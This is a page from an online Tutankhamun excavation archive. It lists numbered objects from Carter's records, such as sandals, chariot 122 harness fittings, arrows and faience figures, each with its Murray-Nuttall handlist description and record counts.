(hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for collar - (hits/occ.: 33)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for iwzxh0bgnhzw0cmtaaar33vjtk1nrmkp6x7m01byxwzqfkrggemaf95gt96trjku5jsffbnp_ha6q_aem_zmfrzwr1bw15mtziexrlcw - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for 1 - (hits/occ.: 145)
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Carter No. Description in Murray-Nuttall Handlist No. of
021f Decorated sandal (pair to 021g) 4/2
021g Decorated sandal (pair to 021f) 2/1
021h Sandal of leather (pair to 021i) 1/0
021i Sandal of leather (pair to 021h) 1/2
021k Decorated shoe (pair to 021l) 3/2
021l Decorated shoe (pair to 021k) 3/2
026 Lid of reed basket 119 1/6
079d 10 flat folded bundles of cloth tied together 3/1
079o 12 roll bandages 1/1
090 Footstool (belonging to throne 91) 2/8
091a One hinged piece of canopy of 123 1/0
092a Hinged piece of canopy of 123 1/1
092c Gold sequin from box 21aa 1/0
092j Hinged piece of canopy of 123 1/0
095b One stick from shrine 123 1/2
109 Gold pole-collar, with inlay, from 120 1/2
111 Lid of box 115 1/2
113 Two pieces of golden canopy [of portable pavilion 123] 1/4
120f Wooden hawk, covered with gesso and gilt, f rom chariot 120 1/1
120g Two circular wooden check-rowels from harness. From chariot 120 2/4
122a Axle decoration, from chariot 122 2/3
122b Pole, from chariot 122 2/0
122c Wheels, from chariot 122 2/8
122d Yoke pole from curricle-like harness, from chariot 122 1/1
122e Wooden saddles from curricle-like harness, from chariot 122 1/1
122f Wooden hawk, covered with gesso and gilt, from chariot 122 2/1
122g Pair of circular wooden goad-like objects (check-rowels), from chariot 122 1/1
122h Dagger-shaped object of wood with captive figure handle, from chariot 122 1/0
122i Pair of blinkers, from chariot 122 2/2
122j Pair of blinkers, from chariot 122 2/2
122k Pair of blinkers, from chariot 122 2/2
122l Bes-head disks, from chariot 122 2/2
122m Disk, gold on thin gesso on wood, from chariot 122 1/0
122n Disk, gold on thin gesso on wood, from chariot 122 1/0
122o Disk, gold on thin gesso on wood, from chariot 122 2/2
122p Disk, gold on thin gesso on wood, from chariot 122 1/0
122q Pair of disks with conical tops, from chariot 122 2/1
122r Pair of disks with conical tops, from chariot 122 2/2
122s Disk with conical top, from chariot 122 2/1
122t Four kneeling captive figures in gesso, gilt, from chariot 122 1/0
122u Part of whip, of wood covered with thick sheet gold, from chariot 122 1/0
122v Embossed sheet gold of harness, from chariot 122 3/1
122w Embossed sheet gold of harness, from chariot 122 3/1
122x Embossed sheet gold of harness, from chariot 122 3/1
122y Embossed sheet gold of harness, from chariot 122 3/1
122z Embossed sheet gold of harness, from chariot 122 3/1
122aa Embossed sheet gold of harness, from chariot 122 3/1
122bb Embossed sheet gold of harness, from chariot 122 3/1
122cc Embossed sheet gold of harness, from chariot 122 3/1
122dd Embossed sheet gold of harness, from chariot 122 3/1
122ee Embossed sheet gold of harness, from chariot 122 4/2
122ff Embossed sheet gold of harness, from chariot 122 4/2
122gg Embossed sheet gold of harness, from chariot 122 3/1
122hh Embossed sheet gold of harness, from chariot 122 3/1
122ii Embossed sheet gold of harness, from chariot 122 3/1
122jj Embossed sheet gold of harness, from chariot 122 2/1
122kk Embossed sheet gold of harness, from chariot 122 3/1
122ll Embossed sheet gold of harness, from chariot 122 3/1
122mm Embossed sheet gold of harness, from chariot 122 3/0
122nn Embossed sheet gold of harness, from chariot 122 3/0
122oo Embossed sheet gold of harness, from chariot 122 3/0
122pp Embossed sheet gold of harness, from chariot 122 3/0
122qq Embossed sheet gold of harness, from chariot 122 3/1
122rr Embossed sheet gold of harness, from chariot 122 3/1
122ss Embossed sheet gold of harness, from chariot 122 3/1
122tt Embossed sheet gold of harness, from chariot 122 3/1
122uu Embossed sheet gold of harness, from chariot 122 3/1
122vv Embossed sheet gold of harness, from chariot 122 3/1
122ww Embossed sheet gold of harness, from chariot 122 3/1
122xx Embossed sheet gold of harness, from chariot 122 3/1
122yy Embossed sheet gold of harness, from chariot 122 3/1
122zz Embossed sheet gold of harness, from chariot 122 3/1
122aaa Embossed sheet gold of harness, from chariot 122 2/1
122bbb Embossed sheet gold of harness, from chariot 122 3/1
122ccc Embossed sheet gold of harness, from chariot 122 3/1
122ddd Embossed sheet gold of harness, from chariot 122 3/1
122eee Embossed sheet gold of harness, from chariot 122 2/0
122fff Embossed sheet gold of harness, from chariot 122 2/0
122ggg Embossed sheet gold of harness, from chariot 122 3/1
122hhh Embossed sheet gold of harness, from chariot 122 3/1
122iii Embossed sheet gold of harness, from chariot 122 3/1
122jjj Embossed sheet gold of harness, from chariot 122 3/1
122kkk Embossed sheet gold of harness, from chariot 122 3/1
122lll Embossed sheet gold of harness, from chariot 122 3/1
122mmm Embossed sheet gold of harness, from chariot 122 3/1
122nnn Embossed sheet gold of harness, from chariot 122 3/1
122ooo Embossed sheet gold of harness, from chariot 122 3/1
122ppp Embossed sheet gold of harness, from chariot 122 3/1
122qqq Embossed sheet gold of harness, from chariot 122 3/1
122rrr Embossed sheet gold of harness, from chariot 122 3/1
122sss Embossed sheet gold of harness, from chariot 122 2/0
122ttt Embossed sheet gold of harness, from chariot 122 3/1
122uuu Embossed sheet gold of harness, from chariot 122 3/1
122vvv Embossed sheet gold of harness, from chariot 122 3/1
122www Embossed sheet gold of harness, from chariot 122 3/1
122xxx Embossed sheet gold of harness, from chariot 122 3/1
122yyy Embossed sheet gold of harness, from chariot 122 3/1
122zzz Embossed sheet gold of harness, from chariot 122 3/1
122aaaa Embossed sheet gold of harness, from chariot 122 4/1
122bbbb Embossed sheet gold of harness, from chariot 122 3/1
122cccc Embossed sheet gold of harness, from chariot 122 3/1
122dddd Embossed sheet gold of harness, from chariot 122 3/1
122eeee Embossed sheet gold of harness, from chariot 122 3/1
122ffff Embossed sheet gold of harness, from chariot 122 3/1
122gggg Embossed sheet gold of harness, from chariot 122 3/1
122hhhh Embossed sheet gold of harness, from chariot 122 3/1
122iiii Embossed sheet gold of harness, from chariot 122 3/1
122jjjj Embossed sheet gold of harness, from chariot 122 3/1
122kkkk Embossed sheet gold of harness, from chariot 122 3/1
122llll Embossed sheet gold of harness, from chariot 122 3/1
122mmmm Embossed sheet gold of harness, from chariot 122 2/0
122nnnn Embossed sheet gold of harness, from chariot 122 3/1
122oooo Embossed sheet gold of harness, from chariot 122 3/1
122pppp Embossed sheet gold of harness, from chariot 122 3/1
122qqqq Embossed sheet gold of harness, from chariot 122 2/1
122rrrr A number of pins of bronze covered with gold, attached to the leather, from chariot 122 2/0
142b Three stool legs and three cross-bars of stool 149 1/2
165 Saddle from chariot 122 1/2
166 Yoke from chariot 122 1/2
198a Four clay troughs belonging to 196, 199, 200, 201 1/0
225 Bag containing 11 sticks and bows (225a-230) 1/3
261f(7) Blue faience pedestal for figure 261f(4) wrapped in linen 1/1
367q 19 greenish-blue faience forelegs of bovine animal 1/0
367r 14 violet faience forelegs of bovine animal 1/1
370qq Group of 18 'footed' arrows 2/4
370ww Group of 10 'footed' arrows 2/4
378 Footstool (of faldstool 351) 3/8
390 Group of 13 arrows 1/5
418h 100 copper miniature agricultural implements 1/0
430 Group of 17 arrows 1/1
432 Wine-jar seal (probably from wine-jar 411) 2/3
468 Group of 15 sticks 2/0
529 Lid of 519 1/2
540 Lid of casket 551 10/8
582c Sword-stick (619a probably belongs to this object) 1/2
582d Sword-stick (619b probably belongs to this object) 1/2
582e Sword-stick (619c probably belongs to this object) 1/2
582f Sword-stick (619d probably belongs to this object) 1/2
585p Fragments of some 10 to 12 bracelets of leather 1/1
602f 31 violet glazed pottery shawabti figures 1/1
611d 106 copper miniature agricultural implements 1/0
614 A group of 11 pottery vessels 1/0
620(9) Throw-stick (faience) (pair with 620(10)) 1/1
620(11) Snake batons (wooden, stucco, and painted) (pair with 620(12)) 1/1
620(12) Snake batons (wooden, stucco, and painted) (pair with 620(11)) 1/1

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None of this material may be reproduced in any form without permission from
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Tutankhamun: Anatomy of an Excavation
Concept & Direction: Jaromir Malek
Web Page & Database Designs: Jonathan Moffett
Scanning & transcript: Sue Hutchison, Elizabeth Fleming, Diana Magee, Kent Rawlinson

page created: Tue Jul 16 13:54:05 2024